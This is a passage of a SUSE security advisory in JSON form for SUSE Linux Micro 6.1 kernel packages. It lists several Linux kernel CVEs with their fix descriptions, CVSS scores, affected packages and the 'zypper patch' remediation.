"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22984",
"url": "https://www.suse.com/security/cve/CVE-2026-22984"
},
{
"category": "external",
"summary": "SUSE Bug 1257217 for CVE-2026-22984",
"url": "https://bugzilla.suse.com/1257217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-22984"
},
{
"cve": "CVE-2026-22985",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22985"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL pointer crash on early ethtool operations\n\nThe RSS LUT is not initialized until the interface comes up, causing\nthe following NULL pointer crash when ethtool operations like rxhash on/off\nare performed before the interface is brought up for the first time.\n\nMove RSS LUT initialization from ndo_open to vport creation to ensure LUT\nis always available. This enables RSS configuration via ethtool before\nbringing the interface up. Simplify LUT management by maintaining all\nchanges in the driver\u0027s soft copy and programming zeros to the indirection\ntable when rxhash is disabled. Defer HW programming until the interface\ncomes up if it is down during rxhash and LUT configuration changes.\n\nSteps to reproduce:\n** Load idpf driver; interfaces will be created\n\tmodprobe idpf\n** Before bringing the interfaces up, turn rxhash off\n\tethtool -K eth2 rxhash off\n\n[89408.371875] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[89408.371908] #PF: supervisor read access in kernel mode\n[89408.371924] #PF: error_code(0x0000) - not-present page\n[89408.371940] PGD 0 P4D 0\n[89408.371953] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[89408.372052] RIP: 0010:memcpy_orig+0x16/0x130\n[89408.372310] Call Trace:\n[89408.372317] \u003cTASK\u003e\n[89408.372326] ? idpf_set_features+0xfc/0x180 [idpf]\n[89408.372363] __netdev_update_features+0x295/0xde0\n[89408.372384] ethnl_set_features+0x15e/0x460\n[89408.372406] genl_family_rcv_msg_doit+0x11f/0x180\n[89408.372429] genl_rcv_msg+0x1ad/0x2b0\n[89408.372446] ? __pfx_ethnl_set_features+0x10/0x10\n[89408.372465] ? __pfx_genl_rcv_msg+0x10/0x10\n[89408.372482] netlink_rcv_skb+0x58/0x100\n[89408.372502] genl_rcv+0x2c/0x50\n[89408.372516] netlink_unicast+0x289/0x3e0\n[89408.372533] netlink_sendmsg+0x215/0x440\n[89408.372551] __sys_sendto+0x234/0x240\n[89408.372571] __x64_sys_sendto+0x28/0x30\n[89408.372585] x64_sys_call+0x1909/0x1da0\n[89408.372604] do_syscall_64+0x7a/0xfa0\n[89408.373140] ? clear_bhb_loop+0x60/0xb0\n[89408.373647] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[89408.378887] \u003c/TASK\u003e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22985",
"url": "https://www.suse.com/security/cve/CVE-2026-22985"
},
{
"category": "external",
"summary": "SUSE Bug 1257277 for CVE-2026-22985",
"url": "https://bugzilla.suse.com/1257277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-22985"
},
{
"cve": "CVE-2026-22988",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22988"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narp: do not assume dev_hard_header() does not change skb-\u003ehead\n\narp_create() is the only dev_hard_header() caller\nmaking assumption about skb-\u003ehead being unchanged.\n\nA recent commit broke this assumption.\n\nInitialize @arp pointer after dev_hard_header() call.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22988",
"url": "https://www.suse.com/security/cve/CVE-2026-22988"
},
{
"category": "external",
"summary": "SUSE Bug 1257282 for CVE-2026-22988",
"url": "https://bugzilla.suse.com/1257282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-22988"
},
{
"cve": "CVE-2026-22990",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22990"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: replace overzealous BUG_ON in osdmap_apply_incremental()\n\nIf the osdmap is (maliciously) corrupted such that the incremental\nosdmap epoch is different from what is expected, there is no need to\nBUG. Instead, just declare the incremental osdmap to be invalid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22990",
"url": "https://www.suse.com/security/cve/CVE-2026-22990"
},
{
"category": "external",
"summary": "SUSE Bug 1257221 for CVE-2026-22990",
"url": "https://bugzilla.suse.com/1257221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-22990"
},
{
"cve": "CVE-2026-22991",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22991"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make free_choose_arg_map() resilient to partial allocation\n\nfree_choose_arg_map() may dereference a NULL pointer if its caller fails\nafter a partial allocation.\n\nFor example, in decode_choose_args(), if allocation of arg_map-\u003eargs\nfails, execution jumps to the fail label and free_choose_arg_map() is\ncalled. Since arg_map-\u003esize is updated to a non-zero value before memory\nallocation, free_choose_arg_map() will iterate over arg_map-\u003eargs and\ndereference a NULL pointer.\n\nTo prevent this potential NULL pointer dereference and make\nfree_choose_arg_map() more resilient, add checks for pointers before\niterating.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22991",
"url": "https://www.suse.com/security/cve/CVE-2026-22991"
},
{
"category": "external",
"summary": "SUSE Bug 1257220 for CVE-2026-22991",
"url": "https://bugzilla.suse.com/1257220"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-22991"
},
{
"cve": "CVE-2026-22992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: return the handler error from mon_handle_auth_done()\n\nCurrently any error from ceph_auth_handle_reply_done() is propagated\nvia finish_auth() but isn\u0027t returned from mon_handle_auth_done(). This\nresults in higher layers learning that (despite the monitor considering\nus to be successfully authenticated) something went wrong in the\nauthentication phase and reacting accordingly, but msgr2 still trying\nto proceed with establishing the session in the background. In the\ncase of secure mode this can trigger a WARN in setup_crypto() and later\nlead to a NULL pointer dereference inside of prepare_auth_signature().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
